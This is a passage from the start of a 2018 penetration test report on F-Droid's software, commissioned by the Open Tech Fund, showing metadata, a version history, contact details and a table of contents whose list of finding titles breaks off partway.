Second_Audit_Report.html

---
layout: page
title: Second Audit Report

---

<br><div valign="top"><div><div style="margin-bottom: 1.3cm;"><table style="border-color: #444444; border-width: 1pt; border-style: solid;" valign="top"><tbody><tr style="border-color: #444444; border-width: 1pt; border-style: solid;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt; background-color: #e2632a; color: white;" valign="top"><div>Client</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Open Tech Fund</div></td></tr><tr style="border-color: #444444; border-width: 1pt; border-style: solid;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt; background-color: #e2632a; color: white;" valign="top"><div>Title</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Penetration Test Report</div></td></tr><tr style="border-color: #444444; border-width: 1pt; border-style: solid;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt; background-color: #e2632a; color: white;" valign="top"><div>Targets</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><div>F-droid Client</div><div>F-droid Privileged Extension</div><div>F-droid Repomaker</div><div>F-droid Server</div><div>F-droid Website</div></div></td></tr><tr style="border-color: #444444; border-width: 1pt; border-style: solid;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt; background-color: #e2632a; color: white;" valign="top"><div>Version</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>1.0</div></td></tr><tr style="border-color: #444444; border-width: 1pt; border-style: solid;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt; background-color: #e2632a; color: white;" valign="top"><div>Pentesters</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><span>Stefan Marsiske</span>, <span>Abhinav Mishra</span>, <span>Mahesh Saptarshi</span></div></td></tr><tr style="border-color: #444444; border-width: 1pt; border-style: solid;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt; background-color: #e2632a; color: white;" valign="top"><div>Authors</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><span>Stefan Marsiske</span>, <span>Abhinav Mishra</span>, <span>Mahesh Saptarshi</span>, <span>Patricia Piolon</span></div></td></tr><tr style="border-color: #444444; border-width: 1pt; border-style: solid;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt; background-color: #e2632a; color: white;" valign="top"><div>Reviewed by</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><div>John Sinteur</div></div></td></tr><tr style="border-color: #444444; border-width: 1pt; border-style: solid;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt; background-color: #e2632a; color: white;" valign="top"><div>Approved by</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Melanie Rieback</div></td></tr></tbody></table></div><div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Version control</div><div style="margin-bottom: 1.3cm;"><table style="border-color: #444444; border-width: 1pt; border-style: solid;" valign="top"><tbody><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt; background-color: #e2632a; color: white;" valign="top"><div>Version</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt; background-color: #e2632a; color: white;" valign="top"><div>Date</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt; background-color: #e2632a; color: white;" valign="top"><div>Author</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt; background-color: #e2632a; color: white;" valign="top"><div>Description</div></td></tr><tr style="background-color: #ededed;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div> 0.1</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>March 2nd, 2018</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><span>Stefan Marsiske</span></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Initial draft - python code audit targets</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div> 0.2</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>April 16th, 2018</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><span>Abhinav Mishra</span>, <span>Mahesh Saptarshi</span></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Final draft for review after adding all issues from code audit and pen-test</div></td></tr><tr style="background-color: #ededed;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div> 0.3</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>August 29th, 2018</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><span>Patricia Piolon</span></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Cleaned up xml, fixed some errors</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>1.0</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>August 29th, 2018</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><span>Patricia Piolon</span></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Finalizing</div></td></tr></tbody></table></div><div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Contact</div><div style="margin-bottom: 5pt; line-height: 6mm; margin-left: 0;">For more information about this
            document and its contents please contact Radically Open Security B.V.</div><div><table style="border-color: #444444; border-width: 1pt; border-style: solid;" valign="top"><tbody style="border-color: #444444; border-width: 1pt; border-style: solid;"><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt; background-color: #e2632a; color: white;" valign="top"><div>Name</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Melanie Rieback</div></td></tr><tr style="border-color: #444444; border-width: 1pt; border-style: solid;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt; background-color: #e2632a; color: white;" valign="top"><div>Address</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Overdiemerweg 28</div><div>1111 PP&nbsp;Diemen</div><div>The Netherlands</div></td></tr><tr style="border-color: #444444; border-width: 1pt; border-style: solid;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt; background-color: #e2632a; color: white;" valign="top"><div>Phone</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>+31 (0)20 2621 255</div></td></tr><tr style="border-color: #444444; border-width: 1pt; border-style: solid;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt; background-color: #e2632a; color: white;" valign="top"><div>Email</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>info@radicallyopensecurity.com</div></td></tr></tbody></table></div><div style="font-size: 9pt; text-align: center; margin-top: 15px; color: #999999;">Radically Open Security B.V. is registered at the trade register
  of the Dutch chamber of commerce under number 60628081.
        </div><div style="color: #e2632a; font-family: Helvetica; font-size: 18pt; margin-bottom: 0.7cm;">Table of Contents</div><div><div><table valign="top"><tbody>


   <tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div style="font-weight: bold; margin-top: 4mm;"><a href="#executiveSummary"><span>1</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div style="font-weight: bold; margin-top: 4mm;"><a href="#executiveSummary">Executive Summary</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right; font-weight: bold; margin-top: 4mm;"><a href="#executiveSummary"><span>&#8226;</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#introduction"><span>1.1</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#introduction">Introduction</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#introduction"><span>&#8226;</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#scope"><span>1.2</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#scope">Scope of work</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#scope"><span>&#8226;</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#objectives"><span>1.3</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#objectives">Project objectives</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#objectives"><span>&#8226;</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#timeline"><span>1.4</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#timeline">Timeline</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#timeline"><span>&#8226;</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#resultsinanutshell"><span>1.5</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#resultsinanutshell">Results In A Nutshell</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#resultsinanutshell"><span>&#8226;</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#findingSummary"><span>1.6</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#findingSummary">Summary of Findings</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#findingSummary"><span>&#8226;</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#recommendationSummary"><span>1.7</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#recommendationSummary">Summary of Recommendations</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#recommendationSummary"><span>&#8226;</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#dataSummary"><span>1.8</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#dataSummary">Charts</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#dataSummary"><span>&#8226;</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#threatlevelpie"><span>1.8.1</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#threatlevelpie">Findings by Threat Level</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#threatlevelpie"><span>&#8226;</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#typepie"><span>1.8.2</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#typepie">Findings by Type</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#typepie"><span>&#8226;</span></a></div></td></tr>
   <tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div style="font-weight: bold; margin-top: 4mm;"><a href="#methodology"><span>2</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div style="font-weight: bold; margin-top: 4mm;"><a href="#methodology">Methodology</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right; font-weight: bold; margin-top: 4mm;"><a href="#methodology"><span>&#8226;</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#planning"><span>2.1</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#planning">Planning</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#planning"><span>&#8226;</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#riskClassification"><span>2.2</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#riskClassification">Risk Classification</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#riskClassification"><span>&#8226;</span></a></div></td></tr>
   <tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div style="font-weight: bold; margin-top: 4mm;"><a href="#recon"><span>3</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div style="font-weight: bold; margin-top: 4mm;"><a href="#recon">Automated Code Scans</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right; font-weight: bold; margin-top: 4mm;"><a href="#recon"><span>&#8226;</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#scans"><span>3.1</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#scans">Automated Scan Tools</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#scans"><span>&#8226;</span></a></div></td></tr>
   <tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div style="font-weight: bold; margin-top: 4mm;"><a href="#techSummary"><span>4</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div style="font-weight: bold; margin-top: 4mm;"><a href="#techSummary">Pentest Technical Summary</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right; font-weight: bold; margin-top: 4mm;"><a href="#techSummary"><span>&#8226;</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#findings"><span>4.1</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#findings">Findings</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#findings"><span>&#8226;</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f8-evasion-of-bleach-sanitizer-in-repomaker"><span>4.1.1</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f8-evasion-of-bleach-sanitizer-in-repomaker">OTF-001 &#8212; Evasion of Bleach Sanitizer in Repomaker</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#f8-evasion-of-bleach-sanitizer-in-repomaker"><span>&#8226;</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f14-shell-code-injection-via-malicious-appids-into-fdroidserver"><span>4.1.2</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f14-shell-code-injection-via-malicious-appids-into-fdroidserver">OTF-002 &#8212; Shell Code Injection Via Malicious Appids Into Fdroidserver</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#f14-shell-code-injection-via-malicious-appids-into-fdroidserver"><span>&#8226;</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f23-code-injection-in-fdroidserver-metadata-yaml-parsing"><span>4.1.3</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f23-code-injection-in-fdroidserver-metadata-yaml-parsing">OTF-003 &#8212; Code Injection in Fdroidserver Metadata Yaml Parsing</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#f23-code-injection-in-fdroidserver-metadata-yaml-parsing"><span>&#8226;</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f25-infoleak-in-fdroidserver-checkupdates-py"><span>4.1.4</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f25-infoleak-in-fdroidserver-checkupdates-py">OTF-004 &#8212; Infoleak in Fdroidserver Checkupdates.py</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#f25-infoleak-in-fdroidserver-checkupdates-py"><span>&#8226;</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f26-code-injection-in-fdroidserver-checkupdates-py-through-eval--ed-user-supplied-data"><span>4.1.5</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f26-code-injection-in-fdroidserver-checkupdates-py-through-eval--ed-user-supplied-data">OTF-005 &#8212; Code Injection in Fdroidserver Checkupdates Through Eval'ed User Supplied Data</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#f26-code-injection-in-fdroidserver-checkupdates-py-through-eval--ed-user-supplied-data"><span>&#8226;</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f27-code-injection-via-malicious-appid-in-fdroidserver-build-py"><span>4.1.6</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f27-code-injection-via-malicious-appid-in-fdroidserver-build-py">OTF-006 &#8212; Code Injection Via Malicious Appid in Fdroidserver Build.py</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#f27-code-injection-via-malicious-appid-in-fdroidserver-build-py"><span>&#8226;</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f29-javascript-injection-into-htmlified-package-descriptions-in-fdroidserver-metadata-py"><span>4.1.7</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f29-javascript-injection-into-htmlified-package-descriptions-in-fdroidserver-metadata-py">OTF-007 &#8212; Javascript Injection Into HTMLified Descriptions in Fdroidserver Metadata</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#f29-javascript-injection-into-htmlified-package-descriptions-in-fdroidserver-metadata-py"><span>&#8226;</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f33-bluetoothserver-java-request-uri-included-in-response"><span>4.1.8</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f33-bluetoothserver-java-request-uri-included-in-response">OTF-008 &#8212; Unvalidated User Input Included in Response</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#f33-bluetoothserver-java-request-uri-included-in-response"><span>&#8226;</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f39-trustonfirstuse-tofu-usage"><span>4.1.9</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f39-trustonfirstuse-tofu-usage">OTF-009 &#8212; Applicatioin uses TrustOnFirstUse (TOFU) Usage unverified signing certificate</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#f39-trustonfirstuse-tofu-usage"><span>&#8226;</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f49--fdroid-client-exploiting-nearby-swap-feature-to-show-malicious-prompt-to-users-or-redirect-to-malicious-sites"><span>4.1.10</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f49--fdroid-client-exploiting-nearby-swap-feature-to-show-malicious-prompt-to-users-or-redirect-to-malicious-sites">OTF-010 &#8212; (fdroid Client) Exploiting "Nearby Swap" Feature to Show Malicious Prompt to Users or Redirect to Malicious Sites</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#f49--fdroid-client-exploiting-nearby-swap-feature-to-show-malicious-prompt-to-users-or-redirect-to-malicious-sites"><span>&#8226;</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f12-weak-regexps-filtering-xss-and-unwanted-html-tags-in-fdroidserver-lint-py"><span>4.1.11</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f12-weak-regexps-filtering-xss-and-unwanted-html-tags-in-fdroidserver-lint-py">OTF-011 &#8212; Weak Regexps Filtering XSS and Unwanted HTML Tags in Fdroidserver/lint.py</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#f12-weak-regexps-filtering-xss-and-unwanted-html-tags-in-fdroidserver-lint-py"><span>&#8226;</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f13-key-alias-collisions-can-lead-to-dos-of-publishing-in-fdroidserver"><span>4.1.12</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f13-key-alias-collisions-can-lead-to-dos-of-publishing-in-fdroidserver">OTF-012 &#8212; Key Alias Collisions Can Lead to DoS of Publishing in Fdroidserver</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#f13-key-alias-collisions-can-lead-to-dos-of-publishing-in-fdroidserver"><span>&#8226;</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f15-image-bomb-can-lead-to-dos-in-fdroidserver-update-py"><span>4.1.13</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f15-image-bomb-can-lead-to-dos-in-fdroidserver-update-py">OTF-013 &#8212; Image Bomb Can Lead to DoS in Fdroidserver:update.py</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#f15-image-bomb-can-lead-to-dos-in-fdroidserver-update-py"><span>&#8226;</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f17-insecure-usage-of-temporary-file-directory-in-fdroidserver-docker-drozer-py"><span>4.1.14</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f17-insecure-usage-of-temporary-file-directory-in-fdroidserver-docker-drozer-py">OTF-014 &#8212; Insecure Usage of Temporary File/Directory in Fdroidserver Docker/drozer.py</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#f17-insecure-usage-of-temporary-file-directory-in-fdroidserver-docker-drozer-py"><span>&#8226;</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f20-parsing-untrusted-xml-data-in-fdroidserver"><span>4.1.15</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f20-parsing-untrusted-xml-data-in-fdroidserver">OTF-015 &#8212; Parsing Untrusted XML Data in Fdroidserver</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#f20-parsing-untrusted-xml-data-in-fdroidserver"><span>&#8226;</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f30-downloader-download-file-type-and-size-are-not-verified"><span>4.1.16</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f30-downloader-download-file-type-and-size-are-not-verified">OTF-016 &#8212;  Missing file type and size validation </a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#f30-downloader-download-file-type-and-size-are-not-verified"><span>&#8226;</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f31-bluetoothclient-java-insecure-rfcomm-socket-is-used-for-bluetooth-connection"><span>4.1.17</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f31-bluetoothclient-java-insecure-rfcomm-socket-is-used-for-bluetooth-connection">OTF-017 &#8212; Use of Insecure Communication Mechanism - BluetoothClient.java</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#f31-bluetoothclient-java-insecure-rfcomm-socket-is-used-for-bluetooth-connection"><span>&#8226;</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f32-bluetoothserver-java-insecure-rfcomm-socket-used-for-bluetooth-connection"><span>4.1.18</span></a></div></td><td 